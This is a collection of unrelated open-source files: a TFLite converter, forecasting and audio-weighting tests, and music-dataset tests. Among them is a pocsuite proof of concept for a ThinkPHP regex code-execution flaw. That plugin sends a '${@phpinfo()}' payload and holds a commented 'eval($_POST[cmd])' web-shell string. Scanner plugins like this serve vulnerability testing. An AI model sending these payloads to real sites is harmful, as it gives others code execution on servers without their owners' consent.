def _fix_quantization_attribs(self, graph):
for tensor in graph.tensors:
if tensor.quant:
opname = tensor.quant['op-name']
if opname != 'zero_point_linear_quantize':
raise ConversionError("Quantization operation '{}' cannot be converted to TFLite")
del tensor.quant['op-name']
del tensor.quant['bits']
if 'signed' in tensor.quant:
del tensor.quant['signed']
if 'symmetric' in tensor.quant:
del tensor.quant['symmetric']
def _fix_custom_options(self, graph):
for op in graph.operations:
if op.custom:
options = op.attribs.get(CustomOptionsKey)
if options is not None:
op.attribs[CustomOptionsKey] = bytes.fromhex(options)
def _make_constant(self, graph, dtype, value, inline):
return Tensor(graph, dtype=dtype, shape=self._shape_of(value), data=value)
def _ensure_constant_producer(self, tensor):
pass
def _transform_constant(self, tensor, func):
data = func(tensor.data)
tensor.shape = data.shape
tensor.data = data
def _squeeze_operation(self, input, output, axes):
Operation(input.graph, type='SQUEEZE', inputs=input, outputs=output, attribs={'squeeze_dims': axes})
def _unsqueeze_operation(self, input, output, axes):
if len(axes) == 1:
Operation(input.graph, type='EXPAND_DIMS', inputs=(input, self.as_tensor(axes[0], np.int32)),
outputs=output)
else:
Operation(input.graph, type='RESHAPE', inputs=(input, self.as_tensor(output.shape, np.int32)),
outputs=output, attribs={'new_shape': output.shape})
def _transpose_operation(self, input, output, perm):
Operation(input.graph, type='TRANSPOSE', inputs=(input, self.as_tensor(perm, np.int32)),
outputs=output)
def _reshape_operation(self, input, output, shape):
Operation(input.graph, type='RESHAPE', inputs=(input, self.as_tensor(shape, np.int32)), outputs=output,
attribs={'new_shape': shape})
def _bias_operation(self, input, output, bias):
if not isinstance(bias, Tensor):
bias = self.as_tensor(bias, np.float32)
Operation(input.graph, type='ADD', inputs=(input, bias), outputs=output)
def _scale_operation(self, input, output, scalar):
if not isinstance(scalar, Tensor):
scalar = self.as_tensor(scalar, np.float32)
Operation(input.graph, type='MUL', inputs=(input, scalar), outputs=output)
def _pad_operation(self, input, output, paddings):
if not isinstance(paddings, Tensor):
paddings = self.as_tensor(paddings, np.int64)
Operation(input.graph, type='PAD', inputs=(input, paddings), outputs=output, attribs={})
def is_same_padding(self, input_size, output_size, stride):
return all(o == i // s for i, o, s in zip(input_size, output_size, stride))
def is_valid_padding(self, padding):
return len(padding) != 0 and all(p == (0, 0) for p in padding)
def pad_input(self, input, paddings):
if all(item == (0, 0) for item in paddings):
return input
shape = tuple(p + x + q for x, (p, q) in zip(self._working_shape(input), paddings))
output = Tensor(input.graph, dtype=input.dtype, shape=shape, quant=copy.deepcopy(input.quant))
self._pad_operation(input, output, paddings)
return output
_Transforms = Converter.unpack_transforms({
('external', 'constant'):
Transform(type=None),
'conv':
Transform(
type='!"CONV_2D" if not depthwise else "DEPTHWISE_CONV_2D"',
cond={
'!I[0].rank == 4': 'rank must be 4',
},
using={
'depthwise': '!groups == 0',
'channels': '!I[0].shape[1]',
'valid_pad': '!is_valid_padding(padding)',
'same_pad': '!is_same_padding(I[0].shape[2:], O[0].shape[2:], stride)',
'pads': '![(0, 0)] + padding + [(0, 0)]',
},
inputs=(
'!transpose_input(I[0]) if same_pad or valid_pad else pad_input(transpose_input(I[0]), pads)',
'!transpose_filter(I[1], format="NXC" if not depthwise else "CXN")',
'!squeeze_vector(I[2])',
),
outputs='!transpose_output(O[0])',
attribs={
'stride_h': '!stride[0]',
'stride_w': '!stride[1]',
'dilation_h_factor': '!dilation[0]',
'dilation_w_factor': '!dilation[1]',
'padding': '!"VALID" if valid_pad else "SAME"',
'depth_multiplier': '!O[0].shape[1] // channels if depthwise else None',
}
),
'deconv':
Transform(
type='TRANSPOSE_CONV',
cond={
'!I[0].rank == 4': 'rank must be 4',
'!groups == 1': 'groups must be 1',
},
using={
'depthwise': '!groups == 0',
'channels': '!O[0].shape[1]',
'valid_pad': '!is_valid_padding(padding)',
'same_pad': '!is_same_padding(I[0].shape[2:], O[0].shape[2:], stride)',
'pads': '![(0, 0)] + padding + [(0, 0)]',
},
inputs=(
'!as_tensor(ncx_to_nxc(output_shape), np.int32)',
'!transpose_filter(I[1], format="CXN" if not depthwise else "NXC")',
'!transpose_input(I[0]) if same_pad or valid_pad else pad_input(transpose_input(I[0]), pads)',
),
outputs='!bias_add(transpose_output(O[0]), squeeze_vector(I[2]) if I[2].rank == 2 else I[2])',
attribs={
'stride_h': '!stride[0]',
'stride_w': '!stride[1]',
'padding': '!"VALID" if valid_pad else "SAME"',
'depth_multiplier': '!I[1].shape[0] // channels if depthwise else None',
}
),
('max_pool', 'avg_pool'):
Transform(
cond={
'!size[0] == 1 and size[1] == 1 and ': 'size must be 1 in batch and channel dimensions',
'!stride[0] == 1 and stride[1] == 1': 'stride must be 1 in batch and channel dimensions',
},
type=('MAX_POOL_2D', 'AVERAGE_POOL_2D'),
using={
'valid_pad': '!is_valid_padding(padding)',
'same_pad': '!is_same_padding(I[0].shape[2:], O[0].shape[2:], stride[2:])',
},
inputs=(
'!transpose_input(I[0]) if same_pad or valid_pad else pad_input(transpose_input(I[0]), padding)',
),
outputs=(
'!transpose_output(O[0])',
),
attribs={
'filter_height': '!size[2]',
'filter_width': '!size[3]',
'stride_h': '!stride[2]',
'stride_w': '!stride[3]',
'padding': '!"VALID" if valid_pad else "SAME"',
}
),
'reshape':
Transform(
type='RESHAPE',
using={
'new_shape': '!fixed_batch(shape, I[0].shape[0])',
},
inputs=(
'!undo_transpose(I[0])',
'!as_tensor(new_shape, np.int32)',
),
outputs='!O[0]',
attribs={
'new_shape': '!new_shape',
}
),
'concat':
Transform(
type='CONCATENATION',
inputs=['!I[:]'],
outputs='!transpose_like(O[0], I[0])',
attribs={
'axis': '!transpose_axis_like(axis, I[0])',
}
),
'copy':
Transform(
type='RESHAPE',
using={
'shape': '!transpose_list_like(I[0].shape, I[0])',
},
inputs=(
'!I[0]',
'!as_tensor(shape, np.int32)',
),
outputs='!transpose_like(O[0], I[0])',
attribs={
'new_shape': '!shape',
}
),
'linear':
Transform(
type='FULLY_CONNECTED',
inputs=(
'!I[0]',
'!I[1]',
'!squeeze_vector(I[2]) if not is_zero(I[2]) else None',
),
outputs='!O[0]',
attribs={
'fused_activation_function': "NONE",
'weights_format': "DEFAULT",
'keep_num_dims': True,
'asymmetric_quantize_inputs': False,
}
),
'batch_normalization':
Transform(
type='MUL',
cond={
'!I[1].data is not None and I[2].data is not None and'
' (len(I) == 3 or I[3].data is not None) and (len(I) == 4 or I[4].data is not None)':
'all parameters must be constants',
'!not any(t.quant for t in I)': 'quantized inputs or parameters are not supported',
},
using={
'mean': '!np.squeeze(I[1].data, axis=0) if I[1].data is not None else None',
'std': '!np.squeeze(np.sqrt(I[2].data + epsilon), axis=0) if I[2].data is not None else None',
'offset': '!np.squeeze(I[3].data, axis=0) if I[3].data is not None else None if len(I) > 3 else 0',
'scale': '!np.squeeze(I[4].data, axis=0) if I[4].data is not None else None if len(I) > 4 else 1',
},
inputs=(
'!transpose_input(I[0])',
'!as_tensor(scale / std, np.float32)',
),
outputs='!bias_add(transpose_like(O[0], I[0]), as_tensor(offset - scale * mean / std, np.float32))',
),
'l2_normalization':
Transform(
type='L2_NORMALIZATION',
cond={
'!axes == list(range(I[0].rank))': 'axes must denote all dimensions',
},
inputs='!I[0]',
outputs='!transpose_like(O[0], I[0])',
),
'prelu':
Transform(
type='PRELU',
inputs=('!I[0]', '!I[1]'),
outputs='!transpose_like(O[0], I[0])',
),
'pad':
Transform(
type='!"PAD" if border == "constant" else "MIRROR_PAD"',
cond={
'!border in ["constant", "reflect", "reflect-even"]':
'border must be one of "constant", "reflect", "reflect-even"',
},
using={'paddings': '![list(item) for item in padding]'},
inputs=(
'!I[0]',
'!as_tensor(ncx_to_nxc(paddings, cond=transposing(I[0])), np.int32)',
),
outputs='!transpose_like(O[0], I[0])',
attribs={
'mode': '!0 if border == "reflect" else 1 if border == "reflect-even" else None',
},
),
'gather':
Transform(
type='GATHER',
inputs=('!I[0]', '!I[1]'),
outputs='!transpose_like(O[0], I[0])',
attribs={
'axis': '!transpose_axis_like(axis, I[0])',
},
),
'cast':
Transform(
type='CAST',
inputs='!I[0]',
outputs='!transpose_like(O[0], I[0])',
attribs={
'in_data_type': '!I[0].dtype',
'out_data_type': '!O[0].dtype',
},
),
# 'copy': _TFTransforms['copy'].with_type('IDENTITY'), # only works in TF 2.3
'transpose': _TFTransforms['transpose'].with_type('TRANSPOSE'),
'split': _TFTransforms['split'].with_type('SPLIT_V'),
'squeeze': _TFTransforms['squeeze'].with_type('SQUEEZE'),
'unsqueeze': _TFTransforms['unsqueeze'].with_type('!"EXPAND_DIMS" if len(axes) == 1 else "RESHAPE"'),
'relu': _TFTransforms['relu'].with_type('RELU'),
'relu6': _TFTransforms['relu6'].with_type('RELU6'),
'elu': _TFTransforms['elu'].with_type('ELU'),
'leaky_relu': _TFTransforms['leaky_relu'].with_type('LEAKY_RELU'),
'sigmoid': _TFTransforms['sigmoid'].with_type('LOGISTIC'),
'sin': _TFTransforms['sin'].with_type('SIN'),
'cos': _TFTransforms['cos'].with_type('COS'),
'tan': _TFTransforms['tan'].with_type('TAN'),
'asin': _TFTransforms['asin'].with_type('ASIN'),
'acos': _TFTransforms['acos'].with_type('ACOS'),
'atan': _TFTransforms['atan'].with_type('ATAN'),
'sinh': _TFTransforms['sinh'].with_type('SINH'),
'cosh': _TFTransforms['cosh'].with_type('COSH'),
'tanh': _TFTransforms['tanh'].with_type('TANH'),
'asinh': _TFTransforms['asinh'].with_type('ASINH'),
'acosh': _TFTransforms['acosh'].with_type('ACOSH'),
'atanh': _TFTransforms['atanh'].with_type('ATANH'),
'exp': _TFTransforms['exp'].with_type('EXP'),
'log': _TFTransforms['log'].with_type('LOG'),
'abs': _TFTransforms['abs'].with_type('ABS'),
'neg': _TFTransforms['neg'].with_type('NEG'),
'not': _TFTransforms['not'].with_type('LOGICAL_NOT'),
'floor': _TFTransforms['floor'].with_type('FLOOR'),
'ceil': _TFTransforms['ceil'].with_type('CEIL'),
'round': _TFTransforms['round'].with_type('ROUND'),
'sqr': _TFTransforms['sqr'].with_type('SQUARE'),
'sqrt': _TFTransforms['sqrt'].with_type('SQRT'),
'rsqrt': _TFTransforms['rsqrt'].with_type('RSQRT'),
'add': _TFTransforms['add'].with_type('ADD'),
'sub': _TFTransforms['sub'].with_type('SUB'),
'mul': _TFTransforms['mul'].with_type('MUL'),
'div': _TFTransforms['div'].with_type('DIV'),
'pow': _TFTransforms['pow'].with_type('POW'),
'min': _TFTransforms['min'].with_type('MINIMUM'),
'max': _TFTransforms['max'].with_type('MAXIMUM'),
'and': _TFTransforms['and'].with_type('LOGICAL_AND'),
'or': _TFTransforms['or'].with_type('LOGICAL_OR'),
'lt': _TFTransforms['lt'].with_type('LESS'),
'le': _TFTransforms['le'].with_type('LESS_EQUAL'),
'gt': _TFTransforms['gt'].with_type('GREATER'),
'ge': _TFTransforms['ge'].with_type('GREATER_EQUAL'),
'eq': _TFTransforms['eq'].with_type('EQUAL'),
'ne': _TFTransforms['ne'].with_type('NOT_EQUAL'),
'select': _TFTransforms['select'].with_type('SELECT'),
'min_reduce': _TFTransforms['min_reduce'].with_type('REDUCE_MIN'),
'max_reduce': _TFTransforms['max_reduce'].with_type('REDUCE_MAX'),
'mean_reduce': _TFTransforms['mean_reduce'].with_type('MEAN'),
'sum_reduce': _TFTransforms['sum_reduce'].with_type('SUM'),
'any_reduce': _TFTransforms['any_reduce'].with_type('REDUCE_ANY'),
'all_reduce': _TFTransforms['all_reduce'].with_type('REDUCE_ALL'),
'argmin_reduce': _TFTransforms['argmin_reduce'].with_type('ARG_MIN'),
'argmax_reduce': _TFTransforms['argmax_reduce'].with_type('ARG_MAX'),
'stack': _TFTransforms['stack'].with_type('PACK'),
'unstack': _TFTransforms['unstack'].with_type('UNPACK'),
'tile': _TFTransforms['tile'].with_type('TILE'),
'slice': _TFTransforms['slice'].with_type('STRIDED_SLICE'),
'softmax': _TFTransforms['softmax'].with_type('SOFTMAX'),
'local_response_normalization': _TFTransforms['local_response_normalization'].with_type('LOCAL_RESPONSE_NORMALIZATION'),
'nearest_upsample': _TFTransforms['nearest_upsample'].with_type('RESIZE_NEAREST_NEIGHBOR'),
'nearest_downsample': _TFTransforms['nearest_downsample'].with_type('RESIZE_NEAREST_NEIGHBOR'),
'multilinear_upsample': _TFTransforms['multilinear_upsample'].with_type('RESIZE_BILINEAR'),
'add_n': _TFTransforms['add_n'].with_type('ADD_N'),
})
|
vul/4-thinkphp-getshell.py | zx273983653/vulscan | 582 | 12716448 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
class ThinkphpPOC(POCBase):
vulID = '4' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2017-03-01' #漏洞公开的时间,不知道就写今天
author = 'ly55521' # PoC作者的大名
createDate = '2017-03-01'# 编写 PoC 的日期
updateDate = '2017-03-01'# PoC 更新的时间,默认和编写时间一样
references = 'http://0535code.com/'# 漏洞地址来源,0day不用写
name = 'Thinkphp Command execution'# PoC 名称
appPowerLink = 'http://www.thinkphp.cn/'# 漏洞厂商主页地址
appName = 'Thinkphp'# 漏洞应用名称
appVersion = 'Thinkphp 0.0-3.1 Lite'# 漏洞影响版本
vulType = 'code-exec'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
Thinkphp正则-e模式代码执行漏洞
''' # 漏洞简要描述
samples = ["http://down.51cto.com/data/283085","/examples/Blog/index.php"]# 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
#验证漏洞 pocsuite -r 4-thinkphp-getshell.py -u 1.1.1.1 --verify
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
import urlparse
vul_url = urlparse.urlparse(self.url).scheme + "://" + urlparse.urlparse(self.url).netloc
send_payload = "/index.php/module/aciton/param1/${@phpinfo()}"
url = vul_url + send_payload
#print url
try:
r = req.get(url=url, timeout=5,allow_redirects=False) #禁止重定向
if r.status_code == 200 and "<title>phpinfo()</title>" in r.text:
#print u"存在漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = send_payload
else:
result = {}
except Exception,e:
#print "error!"
result = {}
print '[+]4 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
# /index.php/module/action/param1/{${eval($_POST[cmd])}}
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(ThinkphpPOC)
|
experiments/arima_prophet_adapter/src/evaluation.py | Nixtla/statsforecast | 483 | 12716463 | from itertools import product
import numpy as np
import pandas as pd
from neuralforecast.losses.numpy import mape, rmse, smape, mae, mase
from neuralforecast.data.datasets.m4 import M4Evaluation, M4Info
from src.data import get_data, dict_datasets
def evaluate(lib: str, dataset: str, group: str):
try:
forecast = pd.read_csv(f'data/{lib}-forecasts-{dataset}-{group}.csv')
except:
return None
y_train, horizon, freq, seasonality = get_data('data/', dataset, group)
y_train = y_train['y'].values
y_test, *_ = get_data('data/', dataset, group, False)
y_test = y_test['y'].values.reshape(-1, horizon)
y_hat = forecast[lib].values.reshape(-1, horizon)
evals = {}
for metric in (mape, smape):
metric_name = metric.__name__
if metric_name == 'mase':
loss = mase(y_test, y_hat, y_train, seasonality=seasonality)
loss = loss.mean()
else:
loss = metric(y_test, y_hat, axis=1).mean()
evals[metric_name] = loss
evals = pd.DataFrame(evals, index=[f'{dataset}_{group}']).rename_axis('dataset').reset_index()
times = pd.read_csv(f'data/{lib}-time-{dataset}-{group}.csv')
evals = pd.concat([evals, times], axis=1)
return evals
if __name__ == '__main__':
groups = ['Yearly', 'Quarterly', 'Monthly', 'Other', 'Daily', 'Hourly', 'Weekly']
lib = ['arima_prophet_adapter', 'prophet']
datasets = ['M3', 'Tourism', 'M4', 'PeytonManning']
evaluation = [evaluate(lib, dataset, group) for lib, group in product(lib, groups) for dataset in datasets]
evaluation = [eval_ for eval_ in evaluation if eval_ is not None]
evaluation = pd.concat(evaluation)
evaluation = evaluation[['dataset', 'model', 'mape', 'smape', 'time']]
evaluation['time'] /= 60 #minutes
evaluation = evaluation.set_index(['dataset', 'model']).stack().reset_index()
evaluation.columns = ['dataset', 'model', 'metric', 'val']
evaluation = evaluation.set_index(['dataset', 'metric', 'model']).unstack().round(2)
evaluation = evaluation.droplevel(0, 1).reset_index()
evaluation.to_csv('data/evaluation.csv')
|
waveform_analysis/tests/test_ABC_weighting.py | pirun/waveform_analysis | 125 | 12716464 | import pytest
from scipy import signal
from scipy.interpolate import interp1d
import numpy as np
from numpy import pi
# This package must first be installed with `pip install -e .` or similar
from waveform_analysis import ABC_weighting, A_weighting, A_weight
# It will plot things for sanity-checking if MPL is installed
try:
import matplotlib.pyplot as plt
mpl = True
except ImportError:
mpl = False
# ANSI S1.4-1983 Table AI "Exact frequency"
frequencies = np.array((10.00, 12.59, 15.85, 19.95, 25.12, 31.62, 39.81,
50.12, 65.10, 79.43, 100.00, 125.90, 158.50, 199.50,
251.20, 316.20, 398.10, 501.20, 631.00, 794.30,
1000.00, 1259.00, 1585.00, 1995.00, 2512.00, 3162.00,
3981.00, 5012.00, 6310.00, 7943.00, 10000.00,
12590.00, 15850.00, 19950.00, 25120.00, 31620.00,
39810.00, 50120.00, 63100.00, 79430.00, 100000.00,
))
responses = {}
# ANSI S1.4-1983 Table AI "A weighting"
responses['A'] = np.array((-70.4, -63.4, -56.7, -50.5, -44.7, -39.4, -34.6,
-30.2, -26.2, -22.5, -19.1, -16.1, -13.4, -10.9,
-8.6, -6.6, -4.8, -3.2, -1.9, -0.8, 0.0, +0.6,
+1.0, +1.2, +1.3, +1.2, +1.0, +0.5, -0.1, -1.1,
-2.5, -4.3, -6.6, -9.3, -12.4, -15.8, -19.3, -23.1,
-26.9, -30.8, -34.7,
))
# ANSI S1.4-1983 Table IV "B Weighting"
responses['B'] = np.array((-38.2, -33.2, -28.5, -24.2, -20.4, -17.1, -14.2,
-11.6, -9.3, -7.4, -5.6, -4.2, -3.0, -2.0, -1.3,
-0.8, -0.5, -0.3, -0.1, 0.0, 0.0, 0.0, 0.0, -0.1,
-0.2, -0.4, -0.7, -1.2, -1.9, -2.9, -4.3, -6.1,
-8.4, -11.1,
))
# ANSI S1.4-1983 Table IV "C Weighting"
responses['C'] = np.array((-14.3, -11.2, -8.5, -6.2, -4.4, -3.0, -2.0, -1.3,
-0.8, -0.5, -0.3, -0.2, -0.1, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, -0.1, -0.2, -0.3, -0.5,
-0.8, -1.3, -2.0, -3.0, -4.4, -6.2, -8.5, -11.2,
))
# ANSI S1.4-1983 Table AII "Type 0"
# Stricter than IEC 61672-1 (2002) Table 2 Class 1 (±1.1 dB at 1 kHz)
upper_limits = np.array((+2.0, +2.0, +2.0, +2.0, +1.5, +1.0, +1.0, +1.0, +1.0,
+1.0, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7,
+0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7,
+1.0, +1.0, +1.0, +2.0, +2.0, +2.0, +2.0, +2.4, +2.8,
+3.3, +4.1, +4.9, +5.1, +5.6,
))
lower_limits = np.array((-5.0, -4.0, -3.0, -2.0, -1.5, -1.0, -1.0, -1.0, -1.0,
-1.0, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7,
-0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7,
-1.0, -1.5, -2.0, -3.0, -3.0, -3.0, -3.0, -4.5, -6.2,
-7.9, -9.3, -10.9, -12.2, -14.3,
))
class TestABCWeighting(object):
def test_invalid_params(self):
with pytest.raises(ValueError):
ABC_weighting('D')
def test_freq_resp(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
for curve in {'A', 'B', 'C'}:
N = len(responses[curve]) # Number of frequencies in spec
f_test = frequencies[:N]
upper = responses[curve] + upper_limits[:N]
lower = responses[curve] + lower_limits[:N]
z, p, k = ABC_weighting(curve)
w, h = signal.freqs_zpk(z, p, k, 2*pi*f_test)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure(curve)
plt.title('{}-weighting limits (Type 0)'.format(curve))
plt.semilogx(f_test, levels, alpha=0.7, label='analog')
plt.semilogx(f_test, upper, 'r:', alpha=0.7)
plt.semilogx(f_test, lower, 'r:', alpha=0.7)
plt.grid(True, color='0.7', linestyle='-', which='major')
plt.grid(True, color='0.9', linestyle='-', which='minor')
plt.legend()
assert all(np.less_equal(levels, upper))
assert all(np.greater_equal(levels, lower))
class TestAWeighting(object):
def test_invalid_params(self):
with pytest.raises(TypeError):
A_weighting(fs='spam')
with pytest.raises(ValueError):
A_weighting(fs=10000, output='eggs')
def test_zpkbilinear_bug(self):
# https://github.com/scipy/scipy/pull/7504
# Copied a local version and fixed it, but just to make sure:
z, p, k = A_weighting(fs=48000, output='zpk')
assert k != 0
def test_freq_resp_ba(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
fs = 300000
b, a = A_weighting(fs)
w, h = signal.freqz(b, a, 2*pi*frequencies/fs)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure('A')
plt.semilogx(frequencies, levels, alpha=0.7, label='ba')
plt.legend()
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
def test_freq_resp_zpk(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
fs = 270000
z, p, k = A_weighting(fs, 'zpk')
w, h = signal.freqz_zpk(z, p, k, 2*pi*frequencies/fs)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure('A')
plt.semilogx(frequencies, levels, alpha=0.7, label='zpk')
plt.legend()
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
def test_freq_resp_sos(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
fs = 400000
sos = A_weighting(fs, output='sos')
w, h = signal.sosfreqz(sos, 2*pi*frequencies/fs)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure('A')
plt.semilogx(frequencies, levels, alpha=0.7, label='sos')
plt.legend()
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
class TestAWeight(object):
def test_freq_resp(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
N = 40000
fs = 300000
impulse = signal.unit_impulse(N)
out = A_weight(impulse, fs)
freq = np.fft.rfftfreq(N, 1/fs)
levels = 20 * np.log10(abs(np.fft.rfft(out)))
if mpl:
plt.figure('A')
plt.semilogx(freq, levels, alpha=0.7, label='fft')
plt.legend()
plt.ylim(-80, +5)
# Interpolate FFT points to measure response at spec's frequencies
func = interp1d(freq, levels)
levels = func(frequencies)
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
if __name__ == '__main__':
pytest.main([__file__])
|
GUI/maidfiddler/util/logger.py | mix5003/COM3D2.MaidFiddler | 121 | 12716477 | <reponame>mix5003/COM3D2.MaidFiddler
import logging
from maidfiddler.util.util import BASE_DIR
import os.path
logger = logging.getLogger("MaidFiddler")
def setup_logger():
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')
conoutCh = logging.StreamHandler()
conoutCh.setLevel(logging.DEBUG)
conoutCh.setFormatter(formatter)
fileCh = logging.FileHandler(os.path.join(BASE_DIR, "mf_log.txt"), "w")
fileCh.setLevel(logging.DEBUG)
fileCh.setFormatter(formatter)
logger.addHandler(conoutCh)
logger.addHandler(fileCh) |
pybamm/input/parameters/lithium_ion/positive_electrodes/LiNiCoO2_Ecker2015/nco_ocp_Ecker2015_function.py | manjunathnilugal/PyBaMM | 330 | 12716507 | from pybamm import tanh
def nco_ocp_Ecker2015_function(sto):
"""
NCO OCP as a function of stochiometry [1, 2, 3].
References
----------
.. [1] <NAME>, et al. "Parameterization of a physico-chemical model of
a lithium-ion battery i. determination of parameters." Journal of the
Electrochemical Society 162.9 (2015): A1836-A1848.
.. [2] Ecker, Madeleine, et al. "Parameterization of a physico-chemical model of
a lithium-ion battery ii. model validation." Journal of The Electrochemical
Society 162.9 (2015): A1849-A1857.
.. [3] <NAME>, et. al. "Generalised single particle models for
high-rate operation of graded lithium-ion electrodes: Systematic derivation
and validation." Electrochemica Acta 339 (2020): 135862
Parameters
----------
sto : :class:`pybamm.Symbol`
Stochiometry of material (li-fraction)
"""
# LiNiCo from Ecker, Kabitz, Laresgoiti et al.
# Analytical fit (WebPlotDigitizer + gnuplot)
a = -2.35211
c = 0.0747061
d = 31.886
e = 0.0219921
g = 0.640243
h = 5.48623
i = 0.439245
j = 3.82383
k = 4.12167
m = 0.176187
n = 0.0542123
o = 18.2919
p = 0.762272
q = 4.23285
r = -6.34984
s = 2.66395
t = 0.174352
u_eq = (
a * sto
- c * tanh(d * (sto - e))
- r * tanh(s * (sto - t))
- g * tanh(h * (sto - i))
- j * tanh(k * (sto - m))
- n * tanh(o * (sto - p))
+ q
)
return u_eq
|
tekore/_model/paging.py | Allerter/tekore | 135 | 12716515 | <filename>tekore/_model/paging.py
from typing import Sequence
from dataclasses import dataclass
from .serialise import Model
@dataclass(repr=False)
class Paging(Model):
"""Paging base."""
href: str
items: Sequence[Model]
limit: int
next: str
@dataclass(repr=False)
class OffsetPaging(Paging):
"""
Offset paging base.
Paging that can be navigated both forward and back.
"""
total: int
offset: int
previous: str
@dataclass(repr=False)
class Cursor(Model):
"""Data cursor."""
after: str
@dataclass(repr=False)
class CursorPaging(Paging):
"""
Cursor paging base.
Paging that can be navigated only forward following the cursor.
"""
cursors: Cursor
def __post_init__(self):
self.cursors = Cursor(**self.cursors)
|
tests/test_multitrack.py | p42ul/medleydb | 125 | 12716523 | import unittest
import os
import yaml
from medleydb import multitrack
from medleydb import AUDIO_PATH
from medleydb import MIXING_COEFFICIENTS
class TestMultitrack(unittest.TestCase):
def setUp(self):
self.mtrack = multitrack.MultiTrack("NightPanther_Fire")
self.mtrack2 = multitrack.MultiTrack("Phoenix_ScotchMorris")
self.stem = self.mtrack.stems[8]
self.raw = self.mtrack.raw_audio[8][1]
def test_dataset_version_v1(self):
actual = self.mtrack.dataset_version
expected = 'V1'
self.assertEqual(expected, actual)
def test_dataset_version_v2(self):
mtrack = multitrack.MultiTrack("FennelCartwright_DearTessie")
actual = mtrack.dataset_version
expected = 'V2'
self.assertEqual(expected, actual)
def test_dataset_version_extra(self):
mtrack = multitrack.MultiTrack("AHa_TakeOnMe")
actual = mtrack.dataset_version
expected = 'EXTRA'
self.assertEqual(expected, actual)
def test_invalid_trackid(self):
with self.assertRaises(IOError):
multitrack.MultiTrack("RickAstley_NeverGonnaGiveYouUp")
def test_audio_path(self):
actual = self.mtrack.audio_path
expected = os.path.join(AUDIO_PATH, "NightPanther_Fire")
self.assertEqual(actual, expected)
def test_artist(self):
actual = self.mtrack.artist
expected = "NightPanther"
self.assertEqual(actual, expected)
def test_title(self):
actual = self.mtrack.title
expected = "Fire"
self.assertEqual(actual, expected)
def test_trackid(self):
actual = self.mtrack.track_id
expected = "NightPanther_Fire"
self.assertEqual(actual, expected)
def test_stem_length(self):
actual = len(self.mtrack.stems)
expected = 12
self.assertEqual(actual, expected)
def test_stem_type(self):
actual = type(self.stem)
expected = multitrack.Track
self.assertEqual(actual, expected)
def test_stem_component(self):
actual = self.stem.component
expected = ''
self.assertEqual(actual, expected)
def test_stem_duration(self):
actual = self.stem.duration
expected = None
self.assertEqual(actual, expected)
def test_stem_fname(self):
actual = os.path.basename(self.stem.audio_path)
expected = "NightPanther_Fire_STEM_08.wav"
self.assertEqual(actual, expected)
def test_stem_instrument(self):
actual = self.stem.instrument
expected = ["auxiliary percussion"]
self.assertEqual(actual, expected)
def test_stem_f0_type(self):
actual = self.stem.f0_type
expected = ["u"]
self.assertEqual(actual, expected)
def test_stem_mixpath(self):
actual = os.path.basename(self.stem.mix_path)
expected = "NightPanther_Fire_MIX.wav"
self.assertEqual(actual, expected)
def test_stem_pitch_annot_none(self):
actual = self.stem.pitch_annotation
expected = None
self.assertEqual(actual, expected)
def test_stem_pitch_pyin_none(self):
actual = self.stem.pitch_estimate_pyin
expected = None
self.assertEqual(actual, expected)
def test_stem_pitch_annot_exists(self):
actual = self.mtrack.stems[7].pitch_annotation
expected_len = 18268
self.assertEqual(len(actual), expected_len)
def test_stem_pitch_pyin_exists(self):
actual = self.mtrack.stems[7].pitch_estimate_pyin
expected_len = 25175
self.assertEqual(len(actual), expected_len)
def test_stem_raw_idx(self):
actual = self.stem.raw_idx
expected = None
self.assertEqual(actual, expected)
def test_stem_stem_idx(self):
actual = self.stem.stem_idx
expected = 8
self.assertEqual(actual, expected)
def test_raw_length1(self):
actual = len(self.mtrack.raw_audio)
expected = 12
self.assertEqual(actual, expected)
def test_raw_length2(self):
actual = len(multitrack.get_dict_leaves(self.mtrack.raw_audio))
expected = 55
self.assertEqual(actual, expected)
def test_raw_type(self):
actual = type(self.raw)
expected = multitrack.Track
self.assertEqual(actual, expected)
def test_raw_component(self):
actual = self.raw.component
expected = ''
